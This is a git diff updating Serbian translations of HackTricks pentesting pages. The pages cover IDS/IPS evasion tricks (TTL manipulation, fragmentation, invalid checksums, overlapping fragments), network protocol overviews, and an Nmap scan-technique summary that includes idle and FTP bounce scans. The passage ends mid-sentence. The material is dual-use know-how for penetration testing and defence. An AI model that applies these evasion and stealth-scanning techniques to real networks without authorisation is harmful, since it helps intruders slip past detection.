-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite videti **vašu kompaniju oglašenu na HackTricks-u** ili **preuzeti HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} # **Manipulacija TTL-om** -Pošaljite nekoliko paketa sa TTL-om dovoljnim da stignu do IDS/IPS-a, ali nedovoljnim da stignu do krajnjeg sistema. Zatim pošaljite druge pakete sa istim sekvencama kao i prethodni, tako da će IPS/IDS misliti da su to ponavljanja i neće ih proveravati, ali zapravo nose zlonamerni sadržaj. +Pošaljite nekoliko paketa sa TTL-om dovoljnim da stignu do IDS/IPS-a, ali ne dovoljnim da stignu do krajnjeg sistema. Zatim pošaljite još paketa sa istim sekvencama kao prethodni, tako da će IPS/IDS misliti da su to ponavljanja i neće ih proveriti, ali zapravo nose zlonamerni sadržaj. **Nmap opcija:** `--ttlvalue ` @@ -25,29 +26,29 @@ Jednostavno dodajte smeće podatke u pakete kako bi se izbegao potpis IPS/IDS-a. **Nmap opcija:** `--data-length 25` -# **Fragmentirani paketi** +# **Fragmentirani Paketi** -Jednostavno fragmentirajte pakete i pošaljite ih. Ako IDS/IPS nema mogućnost da ih ponovo sastavi, stići će do krajnjeg hosta. +Jednostavno fragmentirajte pakete i pošaljite ih. Ako IDS/IPS nema sposobnost da ih ponovo sastavi, stići će do krajnjeg domaćina. **Nmap opcija:** `-f` # **Nevažeći** _**checksum**_ -Senzori obično ne računaju kontrolnu sumu iz performansnih razloga. Dakle, napadač može poslati paket koji će biti **interpretiran od strane senzora, ali odbačen od strane krajnjeg hosta.** Primer: +Senzori obično ne računaju kontrolnu sumu iz performansnih razloga. Dakle, napadač može poslati paket koji će biti **tumačen od strane senzora, ali odbačen od strane krajnjeg domaćina.** Primer: -Pošaljite paket sa zastavicom RST i nevažećom kontrolnom sumom, tako da će IPS/IDS možda pomisliti da taj paket zatvara konekciju, ali će ga krajnji host odbaciti jer je kontrolna suma nevažeća. +Pošaljite paket sa zastavicom RST i nevažećom kontrolnom sumom, tako da će IPS/IDS možda pomisliti da ovaj paket zatvara vezu, ali će krajnji domaćin odbaciti paket jer je kontrolna suma nevažeća. # **Neobične IP i TCP opcije** -Senzor može ignorisati pakete sa određenim zastavicama i opcijama postavljenim u zaglavljima IP i TCP protokola, dok će odredišni host prihvatiti paket po prijemu. +Senzor može odbaciti pakete sa određenim zastavicama i opcijama postavljenim unutar IP i TCP zaglavlja, dok odredišni domaćin prihvata paket po prijemu. # **Preklapanje** -Moguće je da kada fragmentirate paket, postoji neka vrsta preklapanja između paketa (možda prvih 8 bajtova paketa 2 se preklapa sa poslednjih 8 bajtova paketa 1, a poslednjih 8 bajtova paketa 2 se preklapa sa prvih 8 bajtova paketa 3). Ako IDS/IPS sastavi pakete na drugačiji način od krajnjeg hosta, drugačije će biti interpretiran paket.\ -Ili možda, dolaze 2 paketa sa istim pomerajem i host mora da odluči koji će uzeti. +Moguće je da kada fragmentirate paket, postoji neka vrsta preklapanja između paketa (možda prva 8 bajta paketa 2 preklapa se sa poslednjih 8 bajta paketa 1, a poslednjih 8 bajta paketa 2 preklapa se sa prva 8 bajta paketa 3). Zatim, ako IDS/IPS ponovo sastavi pakete na drugačiji način od krajnjeg domaćina, biće tumačen drugačije.\ +Ili možda, dolaze 2 paketa sa istim offsetom i domaćin mora odlučiti koji uzima. -* **BSD**: Preferira pakete sa manjim _pomerajem_. Za pakete sa istim pomerajem, izabraće prvi. -* **Linux**: Kao BSD, ali preferira poslednji paket sa istim pomerajem. +* **BSD**: Ima prednost za pakete sa manjim _offsetom_. Za pakete sa istim offsetom, izabraće prvi. +* **Linux**: Kao BSD, ali preferira poslednji paket sa istim offsetom. * **Prvi** (Windows): Prva vrednost koja dolazi, vrednost koja ostaje. * **Poslednji** (cisco): Poslednja vrednost koja dolazi, vrednost koja ostaje. @@ -56,16 +57,17 @@ Ili možda, dolaze 2 paketa sa istim pomerajem i host mora da odluči koji će u * [https://github.com/vecna/sniffjoke](https://github.com/vecna/sniffjoke) +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite videti **vašu kompaniju oglašenu na HackTricks-u** ili **preuzeti HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md b/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md index 8775693ed..4c3a08d62 100644 --- a/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md +++ b/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md @@ -1,70 +1,75 @@ +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite videti **vašu kompaniju oglašenu na HackTricks-u** ili **preuzeti HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} ## Multicast DNS (mDNS) -Protokol **mDNS** je dizajniran za razrešavanje IP adresa unutar malih, lokalnih mreža bez posebnog imenskog servera. Radi tako što šalje multicast upit unutar podmreže, što podstiče host sa određenim imenom da odgovori sa svojom IP adresom. Svi uređaji u podmreži mogu ažurirati svoje mDNS keš memorije sa ovim informacijama. +Protokol **mDNS** je dizajniran za rešavanje IP adresa unutar malih, lokalnih mreža bez posvećenog serverskog imena. Funkcioniše tako što emituje upit unutar podmreže, podstičući host sa određenim imenom da odgovori sa svojom IP adresom. Svi uređaji u podmreži mogu ažurirati svoje mDNS keš memorije sa ovim informacijama. -Ključne tačke koje treba napomenuti: +Ključne tačke za napomenuti: - **Odricanje od imena domena**: Host može osloboditi svoje ime domena slanjem paketa sa TTL-om nula. -- **Ograničenje upotrebe**: mDNS obično razrešava samo imena koja se završavaju na **.local**. Konflikti sa ne-mDNS hostovima u ovom domenu zahtevaju prilagođavanje konfiguracije mreže. -- **Detalji o mrežnom protokolu**: +- **Ograničenje korišćenja**: mDNS obično rešava imena koja se završavaju na **.local** samo. Konflikti sa ne-mDNS hostovima u ovom domenu zahtevaju prilagođavanje mrežne konfiguracije. +- **Detalji o mreži**: - Ethernet multicast MAC adrese: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`. - IP adrese: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`. - Radi preko UDP porta 5353. - mDNS upiti su ograničeni na lokalnu mrežu i ne prelaze rutere. -## DNS-SD (Service Discovery) +## DNS-SD (Otkrivanje servisa) -DNS-SD je protokol za otkrivanje usluga na mreži putem upita specifičnih imena domena (npr. `_printers._tcp.local`). Odgovor uključuje sve povezane domene, kao što su dostupni štampači u ovom slučaju. Kompletnu listu vrsta usluga možete pronaći [ovde](http://www.dns-sd.org/ServiceTypes.html). +DNS-SD je protokol za otkrivanje servisa na mreži putem upita specifičnih domenskih imena (npr. `_printers._tcp.local`). Odgovor uključuje sve povezane domene, kao što su dostupni štampači u ovom slučaju. Kompletna lista tipova servisa može se pronaći [ovde](http://www.dns-sd.org/ServiceTypes.html). -## SSDP (Simple Service Discovery Protocol) +## SSDP (Jednostavan Protokol Otkrivanja Servisa) -SSDP olakšava otkrivanje mrežnih usluga i uglavnom se koristi od strane UPnP-a. To je tekstualni protokol koji koristi UDP preko porta 1900, sa multicast adresiranjem. Za IPv4, određena multicast adresa je `239.255.255.250`. Osnova SSDP-a je [HTTPU](https://en.wikipedia.org/wiki/HTTPU), proširenje HTTP-a za UDP. +SSDP olakšava otkrivanje mrežnih servisa i uglavnom se koristi od strane UPnP-a. To je tekstualni protokol koji koristi UDP preko porta 1900, sa multicast adresiranjem. Za IPv4, određena multicast adresa je `239.255.255.250`. Osnova SSDP-a je [HTTPU](https://en.wikipedia.org/wiki/HTTPU), proširenje HTTP-a za UDP. -## Web Service for Devices (WSD) -Uređaji povezani na mrežu mogu identifikovati dostupne usluge, poput štampača, putem Web Service for Devices (WSD). To uključuje emitovanje UDP paketa. Uređaji koji traže usluge šalju zahteve, dok pružaoci usluga objavljuju svoje ponude. +## Veb Servis za Uređaje (WSD) +Uređaji povezani na mrežu mogu identifikovati dostupne servise, poput štampača, putem Veb Servisa za Uređaje (WSD). To uključuje emitovanje UDP paketa. Uređaji koji traže servise šalju zahteve, dok pružaoci servisa objavljuju svoje ponude. ## OAuth 2.0 -OAuth 2.0 je protokol koji olakšava sigurno, selektivno deljenje informacija o korisniku između usluga. Na primer, omogućava uslugama pristup korisničkim podacima sa Google-a bez višestrukih prijava. Proces uključuje autentifikaciju korisnika, autorizaciju od strane korisnika i generisanje tokena od strane Google-a, što omogućava pristup usluzi određenim korisničkim podacima. +OAuth 2.0 je protokol koji olakšava sigurno, selektivno deljenje korisničkih informacija između servisa. Na primer, omogućava servisima pristup korisničkim podacima sa Google-a bez višestrukih prijava. Proces uključuje autentifikaciju korisnika, autorizaciju od strane korisnika i generisanje tokena od strane Google-a, omogućavajući pristup servisu određenim korisničkim podacima. ## RADIUS -RADIUS (Remote Authentication Dial-In User Service) je protokol za pristup mreži koji se uglavnom koristi od strane ISP-ova. Podržava autentifikaciju, autorizaciju i evidentiranje. Korisnički podaci se proveravaju od strane RADIUS servera, potencijalno uključujući i verifikaciju mrežne adrese radi dodatne sigurnosti. Nakon autentifikacije, korisnici dobijaju pristup mreži, a detalji njihove sesije se prate u svrhe naplate i statistike. +RADIUS (Remote Authentication Dial-In User Service) je protokol za pristup mreži koji se uglavnom koristi od strane provajdera internet usluga. Podržava autentifikaciju, autorizaciju i evidentiranje. Korisnički podaci se proveravaju od strane RADIUS servera, potencijalno uključujući verifikaciju mrežne adrese radi dodatne sigurnosti. Nakon autentifikacije, korisnici dobijaju pristup mreži, a detalji njihove sesije se prate radi obračuna i statističkih svrha. ## SMB i NetBIOS ### SMB (Server Message Block) -SMB je protokol za deljenje datoteka, štampača i portova. Radi direktno preko TCP-a (port 445) ili putem NetBIOS-a preko TCP-a (portovi 137, 138). Ova dvostruka kompatibilnost poboljšava povezivanje sa različitim uređajima. +SMB je protokol za deljenje fajlova, štampača i portova. Radi direktno preko TCP-a (port 445) ili putem NetBIOS-a preko TCP-a (portovi 137, 138). Ova dvostruka kompatibilnost poboljšava povezivanje sa različitim uređajima. ### NetBIOS (Network Basic Input/Output System) -NetBIOS upravlja mrežnim sesijama i vezama za deljenje resursa. Podržava jedinstvena imena za uređaje i grupna imena za više uređaja, omogućavajući ciljano ili emitovano slanje poruka. Komunikacija može biti bez veze (bez potvrde) ili orijentisana ka vezi (bazirana na sesiji). Dok NetBIOS tradicionalno radi preko protokola poput IPC/IPX, često se koristi preko TCP/IP-a. NetBEUI, povezani protokol, poznat je po brzini, ali je takođe bio prilično opširan zbog emitovanja. +NetBIOS upravlja mrežnim sesijama i konekcijama za deljenje resursa. Podržava jedinstvena imena za uređaje i grupna imena za više uređaja, omogućavajući ciljano ili emitovanje poruka. Komunikacija može biti bez konekcije (bez potvrde) ili orijentisana ka konekciji (bazirana na sesiji). Iako NetBIOS tradicionalno radi preko protokola poput IPC/IPX, često se koristi preko TCP/IP-a. NetBEUI, povezani protokol, poznat je po brzini, ali je takođe bio prilično opširan zbog emitovanja. -## LDAP (Lightweight Directory Access Protocol) -LDAP je protokol koji omogućava upravljanje i pristupanje direktorijumskim informacijama preko TCP/IP-a. Podržava različite operacije za upitivanje i izmenu direktorijumskih informacija. Pretežno se koristi za pristupanje i održavanje distribuiranih direktorijumskih informacionih servisa, omogućavajući interakciju sa bazama podataka dizajniranim za LDAP komunikaciju. +## LDAP (Lagan Protokol za Pristup Direktorijumu) +LDAP je protokol koji omogućava upravljanje i pristup informacijama direktorijuma preko TCP/IP-a. Podržava različite operacije za upitivanje i modifikaciju informacija direktorijuma. Pretežno se koristi za pristupanje i održavanje distribuiranih usluga informacija direktorijuma, omogućavajući interakciju sa bazama podataka dizajniranim za LDAP komunikaciju. ## Active Directory (AD) -Active Directory je baza podataka koja je dostupna putem mreže i sadrži objekte poput korisnika, grupa, privilegija i resursa, olakšavajući centralizovano upravljanje mrežnim entitetima. AD organizuje svoje podatke u hijerarhijsku strukturu domena, koja može obuhvatiti servere, grupe i korisnike. Poddomeni omogućavaju daljnju segmentaciju, pri čemu svaki može održavati sopstveni server i korisničku bazu. Ova struktura centralizuje upravljanje korisnicima, omogućavajući dodeljivanje ili ograničavanje pristupa mrežnim resursima. Mogu se postavljati upiti radi dobijanja određenih informacija, poput kontaktnih podataka, ili radi pronalaženja resursa, poput štampača, unutar domena. +Active Directory je baza podataka koja je dostupna putem mreže i sadrži objekte poput korisnika, grupa, privilegija i resursa, olakšavajući centralizovano upravljanje mrežnim entitetima. AD organizuje svoje podatke u hijerarhijsku strukturu domena, koja može obuhvatiti servere, grupe i korisnike. Poddomeni omogućavaju dalju segmentaciju, pri čemu svaki može održavati svoj sopstveni server i korisničku bazu. Ova struktura centralizuje upravljanje korisnicima, dodeljujući ili ograničavajući pristup mrežnim resursima. Upiti se mogu vršiti radi dobijanja određenih informacija, poput kontaktnih detalja, ili radi lociranja resursa, poput štampača, unutar domena. +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. -* Ako želite videti **vašu kompaniju oglašenu na HackTricks-u** ili **preuzeti HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter +
+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md b/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md index c0fffa2a8..d2742da8e 100644 --- a/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md +++ b/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md @@ -1,18 +1,19 @@ -# Nmap Sumirano (ESP) +# Nmap Sumar (ESP) + +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %}
@@ -25,166 +26,166 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24 ### IP adrese za skeniranje * **`,`:** Označava IP adrese direktno -* **`-iL `:** lista_IP-ova -* **`-iR `**: Broj slučajno odabranih IP adresa, možete isključiti moguće IP adrese sa `--isključi ` ili `--isključifajl `. +* **`-iL `:** lista_IP adresa +* **`-iR `**: Broj slučajnih IP adresa, možete isključiti moguće IP adrese sa `--exclude ` ili `--excludefile `. ### Otkrivanje opreme Podrazumevano, Nmap pokreće fazu otkrivanja koja se sastoji od: `-PA80 -PS443 -PE -PP` -* **`-sL`**: Nije invazivan, nabraja ciljeve praveći **DNS** zahteve za rešavanje imena. Korisno je znati da li su svi IP-ovi na primer www.prueba.es/24 naši ciljevi. -* **`-Pn`**: **Bez pinga**. Ovo je korisno ako znate da su svi aktivni (ako ne, mogli biste izgubiti puno vremena, ali ova opcija takođe daje lažne negativne rezultate tvrdeći da nisu aktivni), sprečava fazu otkrivanja. -* **`-sn`** : **Bez skeniranja portova**. Nakon završetka faze izviđanja, ne skenira portove. Relativno je neprimetan i omogućava mali skeniranje mreže. Sa privilegijama šalje ACK (-PA) na 80, SYN(-PS) na 443 i zahtev za eho i zahtev za vremenski pečat, bez privilegija uvek završava konekcije. Ako je cilj mreža, koristi samo ARP(-PR). Ako se koristi sa drugom opcijom, samo se odbacuju paketi druge opcije. -* **`-PR`**: **Ping ARP**. Koristi se podrazumevano prilikom analize računara u našoj mreži, brži je od korišćenja pingova. Ako ne želite da koristite ARP pakete, koristite `--pošalji-ip`. -* **`-PS `**: Šalje SYN pakete na koje ako odgovori SYN/ACK, port je otvoren (ako odgovori sa RST kako bi prekinuo konekciju), ako odgovori RST, port je zatvoren, a ako ne odgovori, nedostupan je. U slučaju nedostatka privilegija, automatski se koristi ukupna konekcija. Ako nisu navedeni portovi, šalje se na 80. -* **`-PA `**: Kao prethodni, ali sa ACK, kombinovanje oba daje bolje rezultate. -* **`-PU `**: Cilj je suprotan, šalju se na portove za koje se očekuje da su zatvoreni. Neki firewalli proveravaju samo TCP konekcije. Ako je zatvoren, odgovara se sa portom nedostupnim, ako se odgovori drugim icmp-om ili ne odgovori, ostaje kao destinacija nedostupna. -* **`-PE, -PP, -PM`** : ICMP PING-ovi: eho odgovor, vremenski pečat i maska adrese. Pokreću se kako bi saznali da li je cilj aktivan. -* **`-PY`**: Šalje SCTP INIT probe na 80 podrazumevano, INIT-ACK(otvoren) ili ABORT(zatvoren) ili ništa ili ICMP nedostupan(neaktivan) može biti odgovor. -* **`-PO `**: Protokol je naznačen u zaglavljima, podrazumevano 1(ICMP), 2(IGMP) i 4(Encap IP). Za ICMP, IGMP, TCP (6) i UDP (17) protokole šalju se zaglavlja protokola, za ostale šalje se samo IP zaglavlje. Svrha ovoga je da zbog deformacije zaglavlja, odgovori na nedostupan protokol ili odgovori istog protokola se šalju kako bi se saznalo da li je aktivan. +* **`-sL`**: Nije invazivan, prikazuje mete praveći **DNS** zahteve za rešavanje imena. Korisno je znati da li su sve IP adrese na primer www.prueba.es/24 naše mete. +* **`-Pn`**: **Bez pinga**. Ovo je korisno ako znate da su sve aktivne (ako ne, možete izgubiti puno vremena, ali ova opcija takođe daje lažne negativne rezultate tvrdeći da nisu aktivne), sprečava fazu otkrivanja. +* **`-sn`** : **Bez skeniranja portova**. Nakon završetka faze izviđanja, ne skenira portove. Relativno je neprimetan i omogućava mali mrežni sken. Sa privilegijama šalje ACK (-PA) na 80, SYN(-PS) na 443 i zahtev za eho i zahtev za vremenski pečat, bez privilegija uvek završava veze. Ako je meta mreža, koristi samo ARP(-PR). Ako se koristi sa drugom opcijom, samo se odbacuju paketi druge opcije. +* **`-PR`**: **Ping ARP**. Koristi se podrazumevano prilikom analize računara u našoj mreži, brži je od korišćenja pingova. Ako ne želite da koristite ARP pakete, koristite `--send-ip`. +* **`-PS `**: Šalje SYN pakete na koje ako odgovori SYN/ACK, port je otvoren (na koji odgovara sa RST kako bi prekinuo vezu), ako odgovori RST, port je zatvoren, a ako ne odgovori, nedostupan je. U slučaju nedostatka privilegija, automatski se koristi ukupna veza. Ako nisu navedeni portovi, šalje ih na 80. +* **`-PA `**: Kao prethodni, ali sa ACK, kombinovanjem oba daje bolje rezultate. +* **`-PU `**: Cilj je suprotan, šalju se na portove za koje se očekuje da su zatvoreni. Neki firewalli proveravaju samo TCP veze. Ako je zatvoren, odgovara se sa nedostupnim portom, ako se odgovori drugim icmp-om ili ne odgovori, ostaje kao nedostupan odredištu. +* **`-PE, -PP, -PM`** : ICMP PING-ovi: eho odgovor, vremenski pečat i maska adrese. Pokreću se kako bi saznali da li je meta aktivna. +* **`-PY`**: Šalje SCTP INIT probe na 80 podrazumevano, INIT-ACK(otvoren) ili ABORT(zatvoren) ili ništa ili ICMP nedostupan(neaktivan) može biti odgovor. +* **`-PO `**: Protokol je naznačen u zaglavljima, podrazumevano 1(ICMP), 2(IGMP) i 4(Encap IP). Za ICMP, IGMP, TCP (6) i UDP (17) protokole šalju se zaglavlja protokola, za ostale se šalje samo IP zaglavlje. Svrha ovoga je da zbog deformacije zaglavlja, odgovori se na Protokol nedostupan ili odgovori istim protokolom kako bi se znalo da li je aktivan. * **`-n`**: Bez DNS-a * **`-R`**: Uvek DNS ### Tehnike skeniranja portova -* **`-sS`**: Ne završava konekciju pa ne ostavlja trag, veoma dobro ako se može koristiti (privilegije). Ovo je podrazumevano korišćeno. -* **`-sT`**: Završava konekciju, pa ostavlja trag, ali se može koristiti sigurno. Podrazumevano bez privilegija. -* **`-sU`**: Sporije, za UDP. Najčešće: DNS(53), SNMP(161,162), DHCP(67 i 68), (-sU53,161,162,67,68): otvoren(odgovor), zatvoren(port nedostupan), filtriran (drugi ICMP), otvoren/filtriran (ništa). U slučaju otvoren/filtriran, -sV šalje brojne zahteve kako bi otkrio bilo koju od podržanih verzija koje nmap podržava i može otkriti pravo stanje. Značajno povećava vreme. -* **`-sY`**: SCTP protokol ne uspeva da uspostavi konekciju, pa nema zapisa, radi kao -PY -* **`-sN,-sX,-sF`:** Null, Fin, Xmas, mogu proći kroz neke firewalle i izvući informacije. Bazirane su na činjenici da standardno usklađene mašine treba da odgovore sa RST na sve zahteve koji nemaju SYN, RST ili ACK oznake podignute: otvoren/filtriran(ništa), zatvoren(RST), filtriran (ICMP nedostupan). Nepouzdane na Windows-u, CIsco-u, BSDI i OS/400. Na unix-u da. -* **`-sM`**: Maimon skeniranje: Šalje FIN i ACK oznake, korišćeno za BSD, trenutno će sve vratiti kao zatvoreno. -* **`-sA, sW`**: ACK i Prozor, koristi se za otkrivanje firewalla, da bi se saznalo da li su portovi filtrirani ili ne. -sW razlikuje otvorene/zatvorene jer otvoreni odgovaraju sa različitom vrednošću prozora: otvoren (RST sa prozorom različitim od 0), zatvoren (RST prozor = 0), filtriran (ICMP nedostupan ili ništa). Ne svi računari rade na ovaj način, pa ako su svi zatvoreni, ne radi, ako su neki otvoreni, radi dobro, a ako su mnogi otvoreni i neki zatvoreni, radi obrnuto. -* **`-sI`:** Idle skeniranje. Za slučajeve kada postoji aktivan firewall, ali znamo da ne filtrira određenu IP adresu (ili kada jednostavno želimo anonimnost) možemo koristiti zombie skener (radi za sve portove), za pronalaženje mogućih zombija možemo koristiti skriptu ipidseq ili eksploataciju pomoćni/skener/ip/ipidseq. Ovaj skener se zasniva na broju IPID paketa IP adrese. -* **`--badsum`:** Šalje pogrešan zbir, računari bi odbacili pakete, ali firewalli bi mogli odgovoriti nešto, koristi se za otkrivanje firewalla. -* **`-sZ`:** "Čudan" SCTP skener, prilikom slanja proba sa fragmentima cookie eha, trebali bi biti odbačeni ako su otvoreni ili odgovoreni sa ABORT ako su zatvoreni. Može proći kroz firewalle kroz koje init ne može proći, loša strana je što ne razlikuje između filtriranih i otvorenih. -* **`-sO`:** Skeniranje protokola Ip. Šalje loša i prazna zaglavlja u kojima se ponekad ne može razlikovati ni protokol. Ako stigne ICMP nedostupan protokol, zatvoren je, ako stigne nedostupan port, otvoren je, ako stigne druga greška, filtriran je, ako ništa ne stigne, otvoren|filtriran. -* **`-b `:** FTPhost--> Koristi se za skeniranje hosta sa drugog, to se radi povezivanjem ftp-a druge mašine i traženjem da pošalje fajlove na portove koje želite skenirati sa druge mašine, prema odgovorima saznaćemo da li su otvoreni ili ne. \[\:\<šifra>@]\\[:\] Skoro svi ftp serveri više ne 